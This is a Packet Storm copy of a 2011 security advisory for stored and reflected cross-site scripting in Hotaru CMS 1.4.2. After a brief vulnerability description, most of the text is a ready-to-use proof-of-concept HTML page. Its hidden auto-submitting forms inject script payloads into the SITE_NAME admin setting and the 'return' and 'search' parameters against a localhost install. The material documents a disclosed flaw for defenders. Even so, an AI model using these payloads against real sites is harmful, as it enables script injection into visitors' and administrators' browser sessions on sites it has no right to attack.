Hotaru CMS 1.4.2 Cross Site Scripting

2011-11-13T00:00:00
ID PACKETSTORM:106938
Type packetstorm
Reporter LiquidWorm
Modified 2011-11-13T00:00:00

Description

                                        
                                            `<!--  
  
Hotaru CMS 1.4.2 SITE_NAME Parameter Stored XSS Vulnerability  
  
  
Vendor: Hotaru CMS  
Product web page: http://www.hotarucms.org  
Affected version: 1.4.2  
  
Summary: Hotaru CMS is an open source, PHP platform for building  
your own websites. With flexible plugins and themes, you can make  
any site you like.  
  
Desc: The CMS suffers from multiple XSS vulnerabilities. Input thru  
the POST parameters 'SITE_NAME' (stored), 'return' (reflected) and  
the GET parameter 'search' (reflected) thru Hotaru.php, are not  
sanitized allowing the attacker to execute HTML code into user's  
browser session on the affected site.  
  
  
Tested on: Microsoft Windows XP Professional SP3 (EN)  
Apache 2.2.21  
MySQL 5.5.16  
PHP 5.3.8  
  
  
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
liquidworm gmail com  
  
  
Advisory ID: ZSL-2011-5057  
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5057.php  
  
  
12.11.2011  
  
-->  
  
  
<html>  
<title>Hotaru CMS 1.4.2 SITE_NAME Parameter Stored XSS Vulnerability</title>  
<body bgcolor="#1C1C1C">  
<script type="text/javascript">  
function xss1(){document.forms["xss1"].submit();}  
function xss2(){document.forms["xss2"].submit();}  
</script><br />  
<form action="http://localhost/hotaru-1-4-2/admin_index.php?page=settings" enctype="application/x-www-form-urlencoded" method="POST" id="xss1">  
<input type="hidden" name="SITE_OPEN" value="true" />  
<input type="hidden" name="SITE_NAME" value='"><script>alert(1)</script>' />  
<input type="hidden" name="THEME" value="default/" />  
<input type="hidden" name="ADMIN_THEME" value="admin_default/" />  
<input type="hidden" name="DEBUG" value="true" />  
<input type="hidden" name="FRIENDLY_URLS" value="false" />  
<input type="hidden" name="DB_CACHE" value="false" />  
<input type="hidden" name="CSS_JS_CACHE" value="true" />  
<input type="hidden" name="HTML_CACHE" value="true" />  
<input type="hidden" name="LANG_CACHE" value="true" />  
<input type="hidden" name="RSS_CACHE" value="true" />  
<input type="hidden" name="SITE_EMAIL" value="lab@zeroscience.mk" />  
<input type="hidden" name="SMTP" value="false" />  
<input type="hidden" name="SMTP_HOST" value="mail.zeroscience.mk" />  
<input type="hidden" name="SMTP_PORT" value="25" />  
<input type="hidden" name="SMTP_USERNAME" value="" />  
<input type="hidden" name="SMTP_PASSWORD" value="" />  
<input type="hidden" name="settings_update" value="true" />  
<input type="hidden" name="csrf" value="48202665ee5176f8a813e4a865381f02" /></form>  
<a href="javascript: xss1();" style="text-decoration:none">  
<b><font color="red"><center><h3>SITE_NAME Param</h3></center></font></b></a><br />  
<form action="http://localhost/hotaru-1-4-2/index.php" enctype="application/x-www-form-urlencoded" method="POST" id="xss2">  
<input type="hidden" name="csrf" value="83405717529ac232d387c8df3cdb01d1" />  
<input type="hidden" name="page" value="login" />  
<input type="hidden" name="password" value="" />  
<input type="hidden" name="remember" value="1" />  
<input type="hidden" name="return" value="%22%20onmouseover%3dprompt%28111%29%20bad%3d%22" />  
<input type="hidden" name="username" value="" /></form>  
<a href="javascript: xss2();" style="text-decoration:none">  
<b><font color="red"><center><h3>return Param</h3></center></font></b></a><br />  
<a href="http://localhost/hotaru-1-4-2/index.php?search=%22%20onmouseover%3dprompt%28111%29%20bad%3d%22" style="text-decoration:none">  
<b><font color="red"><center><h3>search Param</h3></center></font></b></a></body>  
</html>  
  
`